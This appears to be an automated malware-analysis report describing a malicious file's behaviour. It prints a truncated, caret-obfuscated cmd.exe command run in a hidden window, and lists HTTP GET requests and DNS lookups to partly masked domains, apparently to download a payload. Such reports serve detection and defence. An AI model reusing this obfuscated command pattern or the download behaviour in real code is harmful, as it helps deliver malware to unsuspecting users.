Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\cmd.exe' gGJHgj gJH gu gKHNL nl Nl & %C^om^S^p^Ec% /V /c set %SJdLpakpKsiVadV%=iXnfwPBmbJzdwq&&set %zkfGEkodTjRMD%=o^we^r^s&&set %RRVFvTJptqTBDaO%=cctXCqbrHC&&set %iBvqMEmzNGMUU...
Network activity
Connects to
- 'sm###-soft.pl':80
- 'ch####hinenow.com':80
- 'er###joy.com':80
TCP
HTTP GET requests
- http://sm###-soft.pl/wef346645
- http://ch####hinenow.com/wef346645
- http://er###joy.com/wef346645
UDP
- DNS ASK sm###-soft.pl
- DNS ASK ch####hinenow.com
- DNS ASK tr#####stvi-bezdeka.cz
- DNS ASK er###joy.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\cmd.exe' gGJHgj gJH gu gKHNL nl Nl & %C^om^S^p^Ec% /V /c set %SJdLpakpKsiVadV%=iXnfwPBmbJzdwq&&set %zkfGEkodTjRMD%=o^we^r^s&&set %RRVFvTJptqTBDaO%=cctXCqbrHC&&set %iBvqMEmzNGMUU...' (with hidden window)
